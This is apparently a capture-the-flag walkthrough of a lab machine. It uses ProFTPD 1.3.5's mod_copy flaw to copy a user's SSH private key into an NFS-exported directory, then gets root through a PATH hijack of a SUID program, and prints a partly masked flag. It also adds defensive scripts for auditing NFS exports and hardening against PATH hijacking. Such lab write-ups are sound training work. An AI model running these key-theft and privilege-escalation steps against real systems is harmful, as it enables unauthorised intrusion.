Technology with Security
25 June 2020
An nmap scan of the target shows the following open ports and the services running on them:
$ nmap 10.10.143.1 -vvv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
111/tcp open rpcbind syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
2049/tcp open nfs syn-ack
Samba is an open-source implementation of the Server Message Block (SMB/CIFS) protocol for Unix-like systems. It lets clients access files, printers and other shared resources over the network, and it is what allows a Linux host to share with and browse Windows machines, which speak SMB natively. Samba is not the Network File System (NFS): NFS is a separate protocol, and this target exposes both (SMB on 139/445, NFS on 2049 with rpcbind on 111).
The server is running Samba, so we enumerate shares and users with the nmap SMB scripts:
` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.143.1 `
The scan reports the following shares and the paths they map to (Samba reports paths in Windows notation):
guest - C:\tmp
anonymous - C:\home\kenobi\share
print - \var\lib\samba\printers
The anonymous share contains a log.txt with SSH, FTPd and other configuration details, including the location of kenobi's private key, which we make use of below.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.48.174
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
The /var directory is exported to every host (*), so we can mount it from our own machine.
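An export whose client list is * can be mounted by anyone who can reach port 2049, which is what makes the rest of this attack possible. As an added example (not part of the original write-up and not the target's configuration), here is a small POSIX sh check over /etc/exports-style lines that flags entries exported to every host, exported read-write, or exported with no_root_squash. The sample exports are constructed for the demo; the option list on the /var line is an assumption, since nfs-showmount only reports the client list.

```shell
#!/bin/sh
# audit_exports reads /etc/exports-style lines on stdin and prints one
# finding per (path, client) pair that is exported to every host ("*"),
# exported read-write, or exported with no_root_squash. Entries with none
# of those properties produce no output.
audit_exports() {
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line%%#*}             # drop comments
    set -f                       # keep "*" literal: no pathname expansion
    set -- $line                 # split into path and client specs
    set +f
    if [ $# -eq 0 ]; then continue; fi
    path=$1
    shift
    if [ $# -eq 0 ]; then set -- '*'; fi   # no client list means everyone
    for spec in "$@"; do
      host=${spec%%\(*}          # part before "(options)"
      opts=""
      case "$spec" in
        *\(*\)) opts=${spec#*\(}; opts=${opts%\)} ;;
      esac
      findings=""
      if [ "$host" = "*" ]; then findings="$findings any-host"; fi
      case ",$opts," in *,rw,*) findings="$findings rw" ;; esac
      case ",$opts," in *,no_root_squash,*) findings="$findings no_root_squash" ;; esac
      if [ -n "$findings" ]; then
        printf '%s %s:%s\n' "$path" "$host" "$findings"
      fi
    done
  done
}

# Constructed sample, not the target's real /etc/exports. The first line is
# the kind of entry behind the "/var *" seen in nfs-showmount (options
# assumed); the second is the corrected form: one client, read-only,
# root squashed.
demo_exports() {
  audit_exports <<'EOF'
# constructed for the demo
/var *(rw,sync,no_root_squash)
/var 10.10.10.5(ro,sync,root_squash)
/home/kenobi/share 10.10.0.0/16(rw,sync,root_squash)
/backup
EOF
}

demo_exports
```

Only the weak lines are reported: the world-exported /var, the read-write share, and the bare /backup entry, which with no client list is exported to everyone with default options. The corrected /var line produces no finding. In practice run it as `audit_exports < /etc/exports` on the server, or against any exports file pulled during a review.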
A plain netcat connection to the FTP port returns the service banner, including its version:
$ nc 10.10.48.174 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.48.174]
The banner shows ProFTPD 1.3.5. Let's check whether there are known exploits for that version:
$ searchsploit proftpd 1.3.5
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The mod_copy module in ProFTPD 1.3.5 accepts the SITE CPFR (copy from) and SITE CPTO (copy to) commands from any client, authenticated or not, and performs the copy with the FTP server's own privileges (CVE-2015-3306). That lets us copy the private key referenced in log.txt into the /var tree, which we already know is exported over NFS:
nc 10.10.48.174 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.48.174]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Mount the exported /var on our machine to retrieve the file:
sudo mkdir -p /mnt/kenobiNFS
sudo mount 10.10.48.174:/var /mnt/kenobiNFS/
Copy /mnt/kenobiNFS/tmp/id_rsa to a working directory, restrict its permissions (ssh refuses a private key that other users can read) and log in as kenobi:
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.48.174
Looking for unusual files with the SUID bit set:
find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 94240 May 8 2019 /sbin/mount.nfs
-rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
Everything in that list is a standard package binary except /usr/bin/menu, which looks like a custom program, so we examine it. Its three options check a web connection with curl, print the kernel version and show the interface configuration with ifconfig:
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 22:38:57 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0 Link encap:Ethernet HWaddr 02:29:8f:02:e1:de
inet addr:10.10.96.188 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::29:8fff:fe02:e1de/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:2405 errors:0 dropped:0 overruns:0 frame:0
TX packets:2269 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:155505 (155.5 KB) TX bytes:3081289 (3.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:15541 (15.5 KB) TX bytes:15541 (15.5 KB)
The status check calls curl by its bare name rather than an absolute path, so the lookup goes through the caller's PATH. We create a /tmp/curl that executes /bin/sh and put /tmp at the front of PATH. Because the shell searches PATH from left to right, our /tmp/curl is found before the real one. /usr/bin/menu runs with effective user root (SUID), so the command it spawns, and with it our shell, runs as root.
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 755 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
We now have uid=0 (the gid is still 1000(kenobi) because menu is setuid only, not setgid, which makes no difference here). The flag in /root/root.txt is 177b3cd8562--------2721c28381f02
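To make the mechanism behind this privilege escalation concrete, here is an added example that is not the target's binary and not part of the original write-up: two constructed stand-ins for a program that shells out to curl, one calling it by bare name as menu does and one hardened with a fixed PATH and an absolute path, both run with an attacker-controlled directory prepended to PATH. The scratch directory and file names are assumptions for the demo, and the fake curl only announces that it ran instead of spawning a shell.

```shell
#!/bin/sh
# PATH hijack of a program that shells out to "curl", reproduced in a
# scratch directory. menu_vuln and menu_safe are constructed stand-ins,
# not the real /usr/bin/menu.

setup_demo() {
  DEMO=$(mktemp -d) || return 1

  # attacker's file: the same idea as "echo /bin/sh > /tmp/curl" on the
  # target, but it just proves it ran instead of starting a shell
  printf '#!/bin/sh\necho HIJACKED\n' > "$DEMO/curl"

  # vulnerable: bare command name, caller's PATH inherited (what menu does)
  printf '#!/bin/sh\ncurl -I localhost 2>/dev/null || echo "curl failed"\n' > "$DEMO/menu_vuln"

  # hardened: reset PATH to trusted directories and call the absolute path,
  # so nothing the caller put in PATH can be picked up
  printf '#!/bin/sh\nPATH=/usr/bin:/bin; export PATH\n/usr/bin/curl -I localhost 2>/dev/null || echo "curl failed"\n' > "$DEMO/menu_safe"

  chmod 755 "$DEMO/curl" "$DEMO/menu_vuln" "$DEMO/menu_safe"
}

# run a stand-in with the attacker's directory prepended to PATH, exactly
# as "export PATH=/tmp:$PATH" does on the target
run_hijacked() {
  PATH="$DEMO:$PATH" "$DEMO/$1"
}

# prints "HIJACKED": the fake curl was found first
hijack_vuln() { run_hijacked menu_vuln; }

# prints the real curl's output, or "curl failed" if curl is absent or
# nothing listens on localhost, but never "HIJACKED"
hijack_safe() { run_hijacked menu_safe; }

cleanup_demo() { rm -rf "$DEMO"; }

setup_demo
echo "vulnerable: $(hijack_vuln)"
echo "hardened:   $(hijack_safe)"
cleanup_demo
```

On the real target the fake curl is interpreted by /bin/sh, which on Ubuntu is dash and does not drop an effective uid of 0, so the spawned shell keeps root. Fixing the caller's PATH is the minimum; the proper fix for a setuid program is not to run shell commands with an environment the caller controls at all, and to drop privileges before anything that does.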